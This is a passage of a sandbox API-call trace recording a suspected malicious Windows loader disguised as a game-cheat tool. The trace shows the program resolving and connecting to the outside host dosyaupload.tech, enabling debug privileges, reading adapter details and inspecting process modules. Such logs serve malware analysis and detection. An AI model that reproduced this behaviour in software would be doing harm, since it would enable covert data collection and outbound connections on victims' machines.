lpcbData=0x13fe9a0*=0x20) returned 0x0 [0080.045] RegQueryValueExW (in: hKey=0x588, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x13fe9a4, lpData=0x37564d0, lpcbData=0x13fe9a0*=0x20 | out: lpType=0x13fe9a4*=0x1, lpData="@tzres.dll,-321", lpcbData=0x13fe9a0*=0x20) returned 0x0 [0080.046] CoTaskMemAlloc (cb=0x20c) returned 0xf80c8 [0080.047] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xf80c8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0080.048] CoTaskMemFree (pv=0xf80c8) [0080.051] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileMUIPath") returned 0x772e7170 [0080.051] CoTaskMemAlloc (cb=0x20c) returned 0xf80c8 [0080.051] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x13fe9c0, pwszFileMUIPath=0xf80c8, pcchFileMUIPath=0x13fe9c4, pululEnumerator=0x13fe9b8 | out: pwszLanguage=0x0, pcchLanguage=0x13fe9c0, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x13fe9c4, pululEnumerator=0x13fe9b8) returned 1 [0080.189] CoTaskMemFree (pv=0x0) [0080.189] CoTaskMemFree (pv=0xf80c8) [0080.192] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryEx") returned 0x0 [0080.198] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibraryW") returned 0x0 [0080.198] SysReAllocStringLen (in: pbstr=0x13fe8e0*=0x0, psz="tzres.dll.mui", len=0xd | out: pbstr=0x13fe8e0*="tzres.dll.mui") returned 1 [0080.198] CharLowerBuffW (in: lpsz="tzres.dll.mui", cchLength=0xd | out: lpsz="tzres.dll.mui") returned 0xd [0080.199] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x2a00001 [0080.204] GetLastError () returned 0x0 [0080.204] SetLastError (dwErrCode=0x0) [0080.204] GetProcAddress (hModule=0x750c0000, lpProcName="LoadStringW") returned 0x750f0480 [0080.205] CoTaskMemAlloc (cb=0x3ec) returned 0xf1750 [0080.205] LoadStringW (in: hInstance=0x2a00001, uID=0x140, lpBuffer=0xf1750, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0080.205] CoTaskMemFree (pv=0xf1750) [0080.205] FreeLibrary (hLibModule=0x2a00001) returned 1 [0080.206] CoTaskMemAlloc (cb=0x20c) returned 0xf80c8 [0080.206] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xf80c8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0080.206] CoTaskMemFree (pv=0xf80c8) [0080.206] CoTaskMemAlloc (cb=0x20c) returned 0xf80c8 [0080.206] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x13fe9c0, pwszFileMUIPath=0xf80c8, pcchFileMUIPath=0x13fe9c4, pululEnumerator=0x13fe9b8 | out: pwszLanguage=0x0, pcchLanguage=0x13fe9c0, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x13fe9c4, pululEnumerator=0x13fe9b8) returned 1 [0080.209] CoTaskMemFree (pv=0x0) [0080.209] CoTaskMemFree (pv=0xf80c8) [0080.209] SysReAllocStringLen (in: pbstr=0x13fe8e0*=0x0, psz="tzres.dll.mui", len=0xd | out: pbstr=0x13fe8e0*="tzres.dll.mui") returned 1 [0080.209] CharLowerBuffW (in: lpsz="tzres.dll.mui", cchLength=0xd | out: lpsz="tzres.dll.mui") returned 0xd [0080.209] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x2a00001 [0080.210] GetLastError () returned 0x0 [0080.210] SetLastError (dwErrCode=0x0) [0080.210] CoTaskMemAlloc (cb=0x3ec) returned 0xf1750 [0080.210] LoadStringW (in: hInstance=0x2a00001, uID=0x142, lpBuffer=0xf1750, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0080.210] CoTaskMemFree (pv=0xf1750) [0080.210] FreeLibrary (hLibModule=0x2a00001) returned 1 [0080.211] CoTaskMemAlloc (cb=0x20c) returned 0xf80c8 [0080.211] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xf80c8 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0080.211] CoTaskMemFree (pv=0xf80c8) [0080.211] CoTaskMemAlloc (cb=0x20c) returned 0xf80c8 [0080.211] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x13fe9c0, pwszFileMUIPath=0xf80c8, pcchFileMUIPath=0x13fe9c4, pululEnumerator=0x13fe9b8 | out: pwszLanguage=0x0, pcchLanguage=0x13fe9c0, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x13fe9c4, pululEnumerator=0x13fe9b8) returned 1 [0080.212] CoTaskMemFree (pv=0x0) [0080.212] CoTaskMemFree (pv=0xf80c8) [0080.212] SysReAllocStringLen (in: pbstr=0x13fe8e0*=0x0, psz="tzres.dll.mui", len=0xd | out: pbstr=0x13fe8e0*="tzres.dll.mui") returned 1 [0080.212] CharLowerBuffW (in: lpsz="tzres.dll.mui", cchLength=0xd | out: lpsz="tzres.dll.mui") returned 0xd [0080.212] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x2a00001 [0080.213] GetLastError () returned 0x0 [0080.213] SetLastError (dwErrCode=0x0) [0080.213] CoTaskMemAlloc (cb=0x3ec) returned 0xf1750 [0080.213] LoadStringW (in: hInstance=0x2a00001, uID=0x141, lpBuffer=0xf1750, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0080.213] CoTaskMemFree (pv=0xf1750) [0080.213] FreeLibrary (hLibModule=0x2a00001) returned 1 [0080.214] RegCloseKey (hKey=0x588) returned 0x0 [0080.216] SetEvent (hEvent=0x420) returned 1 [0080.224] GetProcAddress (hModule=0x772d0000, lpProcName="LocalFree") returned 0x772e5b40 [0080.225] SysReAllocStringLen (in: pbstr=0x13fdef8*=0x0, psz="iphlpapi.dll", len=0xc | out: pbstr=0x13fdef8*="iphlpapi.dll") returned 1 [0080.225] CharLowerBuffW (in: lpsz="iphlpapi.dll", cchLength=0xc | out: lpsz="iphlpapi.dll") returned 0xc [0080.225] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0080.226] GetLastError () returned 0x7e [0080.226] SetLastError (dwErrCode=0x7e) [0080.229] SysReAllocStringLen (in: pbstr=0x13fdef8*=0x0, psz="iphlpapi.dll", len=0xc | out: pbstr=0x13fdef8*="iphlpapi.dll") returned 1 [0080.229] CharLowerBuffW (in: lpsz="iphlpapi.dll", cchLength=0xc | out: lpsz="iphlpapi.dll") returned 0xc [0080.229] LoadLibraryExW (lpLibFileName="iphlpapi.dll", hFile=0x0, dwFlags=0x800) returned 0x6f540000 [0080.230] GetLastError () returned 0x0 [0080.230] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0080.230] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0080.230] GetModuleFileNameA (in: hModule=0x6f540000, lpFilename=0x13fdddc, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0080.230] GetCurrentProcess () returned 0xffffffff [0080.230] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdee0*=0x6f56a0c8, NumberOfBytesToProtect=0x13fdee4, NewAccessProtection=0x4, OldAccessProtection=0x13fdf18 | out: BaseAddress=0x13fdee0*=0x6f56a000, NumberOfBytesToProtect=0x13fdee4, OldAccessProtection=0x13fdf18*=0x2) returned 0x0 [0080.231] GetCurrentProcess () returned 0xffffffff [0080.231] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdee0*=0x6f56a0c8, NumberOfBytesToProtect=0x13fdee4, NewAccessProtection=0x2, OldAccessProtection=0x13fdf18 | out: BaseAddress=0x13fdee0*=0x6f56a000, NumberOfBytesToProtect=0x13fdee4, OldAccessProtection=0x13fdf18*=0x4) returned 0x0 [0080.231] GetCurrentProcess () returned 0xffffffff [0080.231] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdee0*=0x6f56a0cc, NumberOfBytesToProtect=0x13fdee4, NewAccessProtection=0x4, OldAccessProtection=0x13fdf18 | out: BaseAddress=0x13fdee0*=0x6f56a000, NumberOfBytesToProtect=0x13fdee4, OldAccessProtection=0x13fdf18*=0x2) returned 0x0 [0080.231] GetCurrentProcess () returned 0xffffffff [0080.231] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdee0*=0x6f56a0cc, NumberOfBytesToProtect=0x13fdee4, NewAccessProtection=0x2, OldAccessProtection=0x13fdf18 | out: BaseAddress=0x13fdee0*=0x6f56a000, NumberOfBytesToProtect=0x13fdee4, OldAccessProtection=0x13fdf18*=0x4) returned 0x0 [0080.232] SetLastError (dwErrCode=0x0) [0080.232] GetProcAddress (hModule=0x6f540000, lpProcName="GetNetworkParams") returned 0x6f55d770 [0080.625] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x13febcc | out: pFixedInfo=0x0, pOutBufLen=0x13febcc) returned 0x6f [0081.898] GetProcAddress (hModule=0x772d0000, lpProcName="LocalAlloc") returned 0x772e5b20 [0081.898] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0xf1750 [0081.899] GetNetworkParams (in: pFixedInfo=0xf1750, pOutBufLen=0x13febcc | out: pFixedInfo=0xf1750, pOutBufLen=0x13febcc) returned 0x0 [0082.016] LocalFree (hMem=0xf1750) returned 0x0 [0082.017] CoTaskMemAlloc (cb=0x20c) returned 0xf80c8 [0082.017] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0xf80c8, nSize=0x104 | out: lpBuffer="\xfdd8\x0e蓸\x10") returned 0x0 [0082.017] CoTaskMemFree (pv=0xf80c8) [0082.017] CoTaskMemAlloc (cb=0x20c) returned 0xf80c8 [0082.017] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0xf80c8, nSize=0x104 | out: lpBuffer="\xfdd8\x0e蓸\x10") returned 0x0 [0082.017] CoTaskMemFree (pv=0xf80c8) [0082.022] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5d4 [0082.038] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5a4 [0082.039] GetProcAddress (hModule=0x754f0000, lpProcName="GetAddrInfoW") returned 0x754f7d70 [0082.039] GetProcAddress (hModule=0x754f0000, lpProcName="freeaddrinfo") returned 0x754f4fa0 [0082.039] GetAddrInfoW (in: pNodeName="dosyaupload.tech", pServiceName=0x0, pHints=0x13feab4*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x13fea5c | out: ppResult=0x13fea5c*=0xdf3d8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="dosyaupload.tech", ai_addr=0xe8c98*(sa_family=2, sin_port=0x0, sin_addr="104.27.184.126"), ai_next=0xdf2c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xe8ce0*(sa_family=2, sin_port=0x0, sin_addr="104.27.185.126"), ai_next=0x0))) returned 0 [0083.912] FreeAddrInfoW (pAddrInfo=0xdf3d8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="dosyaupload.tech", ai_addr=0xe8c98*(sa_family=2, sin_port=0x0, sin_addr="104.27.184.126"), ai_next=0xdf2c0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xe8ce0*(sa_family=2, sin_port=0x0, sin_addr="104.27.185.126"), ai_next=0x0))) [0083.922] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5dc [0083.922] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x600 [0083.922] ioctlsocket (in: s=0x5dc, cmd=-2147195266, argp=0x13fea88 | out: argp=0x13fea88) returned 0 [0083.922] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x604 [0083.922] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x608 [0083.922] ioctlsocket (in: s=0x604, cmd=-2147195266, argp=0x13fea88 | out: argp=0x13fea88) returned 0 [0083.922] WSAIoctl (in: s=0x5dc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x13fea70, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x13fea70, lpOverlapped=0x0) returned -1 [0083.922] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x13fe7a0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0083.922] WSAEventSelect (s=0x5dc, hEventObject=0x600, lNetworkEvents=512) returned 0 [0083.923] WSAIoctl (in: s=0x604, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x13fea70, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x13fea70, lpOverlapped=0x0) returned -1 [0083.923] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x13fe7a0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0083.923] WSAEventSelect (s=0x604, hEventObject=0x608, lNetworkEvents=512) returned 0 [0083.923] GetProcAddress (hModule=0x6f540000, lpProcName="GetAdaptersAddresses") returned 0x6f546190 [0083.923] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x13fea6c*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x13fea6c*=0x818) returned 0x6f [0084.262] LocalAlloc (uFlags=0x0, uBytes=0x818) returned 0x10ca50 [0084.262] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x10ca50, SizePointer=0x13fea6c*=0x818 | out: AdapterAddresses=0x10ca50*(Alignment=0x300000178, Length=0x178, IfIndex=0x3, Next=0x10cd00, AdapterName="{9E48833B-70C6-43EE-85DC-893C1782D802}", FirstUnicastAddress=0x10cc74, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #2", FriendlyName="Ethernet 2", PhysicalAddress=([0]=0xe0, [1]=0xb7, [2]=0xb1, [3]=0xc8, [4]=0x23, [5]=0xab, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x3, ZoneIndices=([0]=0x3, [1]=0x3, [2]=0x3, [3]=0x3, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0x19, Ipv6Metric=0x19, Luid=0x6008002000000, Dhcpv4Server.lpSockaddr=0x10cbc8*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11e7933cfae992b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x23, [5]=0x7d, [6]=0xeb, [7]=0x9, [8]=0x7c, [9]=0x4a, [10]=0x82, [11]=0x56, [12]=0xb9, [13]=0x2b, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0), Dhcpv6ClientDuidLength=0xe, Dhcpv6Iaid=0x57c4a82, FirstDnsSuffix=0x0), SizePointer=0x13fea6c*=0x818) returned 0x0 [0084.272] LocalFree (hMem=0x10ca50) returned 0x0 [0084.275] GetProcAddress (hModule=0x754f0000, lpProcName="WSAConnect") returned 0x7550a100 [0084.276] WSAConnect (in: s=0x5d4, name=0x3762098*(sa_family=2, sin_port=0x1bb, sin_addr="104.27.184.126"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0084.295] closesocket (s=0x5a4) returned 0 [0084.309] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe9bc | out: phkResult=0x13fe9bc*=0x5a4) returned 0x0 [0084.309] RegQueryValueExW (in: hKey=0x5a4, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x13fe9d8, lpData=0x0, lpcbData=0x13fe9d4*=0x0 | out: lpType=0x13fe9d8*=0x0, lpData=0x0, lpcbData=0x13fe9d4*=0x0) returned 0x2 [0084.309] RegCloseKey (hKey=0x5a4) returned 0x0 [0084.318] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe9c0 | out: phkResult=0x13fe9c0*=0x5a4) returned 0x0 [0084.318] RegQueryValueExW (in: hKey=0x5a4, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x13fe9dc, lpData=0x0, lpcbData=0x13fe9d8*=0x0 | out: lpType=0x13fe9dc*=0x0, lpData=0x0, lpcbData=0x13fe9d8*=0x0) returned 0x2 [0084.318] RegCloseKey (hKey=0x5a4) returned 0x0 [0084.326] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessIdW") returned 0x0 [0084.349] GetProcAddress (hModule=0x756e0000, lpProcName="LookupPrivilegeValue") returned 0x0 [0084.350] GetProcAddress (hModule=0x756e0000, lpProcName="LookupPrivilegeValueW") returned 0x756f8c80 [0084.350] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x13fe25c | out: lpLuid=0x13fe25c*(LowPart=0x14, HighPart=0)) returned 1 [0084.354] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756fefb0 [0084.354] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessTokenW") returned 0x0 [0084.354] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x13fe258 | out: TokenHandle=0x13fe258*=0x5a4) returned 1 [0084.355] GetProcAddress (hModule=0x756e0000, lpProcName="AdjustTokenPrivileges") returned 0x756fffa0 [0084.355] GetProcAddress (hModule=0x756e0000, lpProcName="AdjustTokenPrivilegesW") returned 0x0 [0084.355] AdjustTokenPrivileges (in: TokenHandle=0x5a4, DisableAllPrivileges=0, NewState=0x3764ea8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0084.356] CloseHandle (hObject=0x5a4) returned 1 [0084.360] GetProcAddress (hModule=0x772d0000, lpProcName="OpenProcess") returned 0x772e5cc0 [0084.363] GetProcAddress (hModule=0x772d0000, lpProcName="OpenProcessW") returned 0x0 [0084.363] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x13d8) returned 0x5a4 [0084.414] SysReAllocStringLen (in: pbstr=0x13fdd18*=0x0, psz="psapi.dll", len=0x9 | out: pbstr=0x13fdd18*="psapi.dll") returned 1 [0084.414] CharLowerBuffW (in: lpsz="psapi.dll", cchLength=0x9 | out: lpsz="psapi.dll") returned 0x9 [0084.414] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll", hFile=0x0, dwFlags=0x800) returned 0x0 [0084.414] GetLastError () returned 0x7e [0084.414] SetLastError (dwErrCode=0x7e) [0084.418] SysReAllocStringLen (in: pbstr=0x13fdd18*=0x0, psz="psapi.dll", len=0x9 | out: pbstr=0x13fdd18*="psapi.dll") returned 1 [0084.418] CharLowerBuffW (in: lpsz="psapi.dll", cchLength=0x9 | out: lpsz="psapi.dll") returned 0x9 [0084.418] LoadLibraryExW (lpLibFileName="psapi.dll", hFile=0x0, dwFlags=0x800) returned 0x74b90000 [0084.529] GetLastError () returned 0x0 [0084.529] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0084.529] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0084.529] GetModuleFileNameA (in: hModule=0x74b90000, lpFilename=0x13fdbfc, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0084.529] GetCurrentProcess () returned 0xffffffff [0084.529] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd00*=0x74b93008, NumberOfBytesToProtect=0x13fdd04, NewAccessProtection=0x4, OldAccessProtection=0x13fdd38 | out: BaseAddress=0x13fdd00*=0x74b93000, NumberOfBytesToProtect=0x13fdd04, OldAccessProtection=0x13fdd38*=0x2) returned 0x0 [0084.529] GetCurrentProcess () returned 0xffffffff [0084.530] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13fdd00*=0x74b93008, NumberOfBytesToProtect=0x13fdd04, NewAccessProtection=0x2, OldAccessProtection=0x13fdd38 | out: BaseAddress=0x13fdd00*=0x74b93000, NumberOfBytesToProtect=0x13fdd04, OldAccessProtection=0x13fdd38*=0x4) returned 0x0 [0084.530] SetLastError (dwErrCode=0x0) [0084.530] GetProcAddress (hModule=0x74b90000, lpProcName="EnumProcessModules") returned 0x74b91370 [0084.531] GetProcAddress (hModule=0x74b90000, lpProcName="EnumProcessModulesW") returned 0x0 [0084.531] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x3764eec, cb=0x100, lpcbNeeded=0x13fe9c8 | out: lphModule=0x3764eec, lpcbNeeded=0x13fe9c8) returned 1 [0084.531] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x3764ff8, cb=0x200, lpcbNeeded=0x13fe9c8 | out: lphModule=0x3764ff8, lpcbNeeded=0x13fe9c8) returned 1 [0084.531] GetProcAddress (hModule=0x74b90000, lpProcName="GetModuleInformation") returned 0x74b91410 [0084.532] GetProcAddress (hModule=0x74b90000, lpProcName="GetModuleInformationW") returned 0x0 [0084.532] GetModuleInformation (in: hProcess=0x5a4, hModule=0xa90000, lpmodinfo=0x3765238, cb=0xc | out: lpmodinfo=0x3765238*(lpBaseOfDll=0xa90000, SizeOfImage=0x388000, EntryPoint=0xe15c44)) returned 1 [0084.532] GetProcAddress (hModule=0x74b90000, lpProcName="GetModuleBaseName") returned 0x0 [0084.532] GetProcAddress (hModule=0x74b90000, lpProcName="GetModuleBaseNameW") returned 0x74b913d0 [0084.532] CoTaskMemAlloc (cb=0x804) returned 0x10ca50 [0084.532] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa90000, lpBaseName=0x10ca50, nSize=0x800 | out: lpBaseName="Cheats_Loader_protected.exe") returned 0x1b [0084.533] CoTaskMemFree (pv=0x10ca50) [0084.533] GetProcAddress (hModule=0x74b90000, lpProcName="GetModuleFileNameEx") returned 0x0 [0084.533] GetProcAddress (hModule=0x74b90000, lpProcName="GetModuleFileNameExW") returned 0x74b913f0 [0084.533] CoTaskMemAlloc (cb=0x804) returned 0x10ca50 [0084.533] GetModuleFileNameExW (in: hProcess=0x5a4, hModule=0xa90000, lpFilename=0x10ca50, nSize=0x800 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe")) returned 0x33 [0084.534] CoTaskMemFree (pv=0x10ca50) [0084.534] CloseHandle (hObject=0x5a4) returned 1 [0084.535] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x105, lpBuffer=0x13fe4c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x0) returned 0x33 [0084.535] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe9c0 | out: phkResult=0x13fe9c0*=0x0) returned 0x2 [0084.535] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe9c0 | out: phkResult=0x13fe9c0*=0x5a4) returned 0x0 [0084.535] RegQueryValueExW (in: hKey=0x5a4, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0x13fe9dc, lpData=0x0, lpcbData=0x13fe9d8*=0x0 | out: lpType=0x13fe9dc*=0x0, lpData=0x0, lpcbData=0x13fe9d8*=0x0) returned 0x2 [0084.535] RegCloseKey (hKey=0x5a4) returned 0x0 [0084.536] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x13fe9c0 | out: phkResult=0x13fe9c0*=0x5a4) returned 0x0 [0084.536] RegQueryValueExW (in: 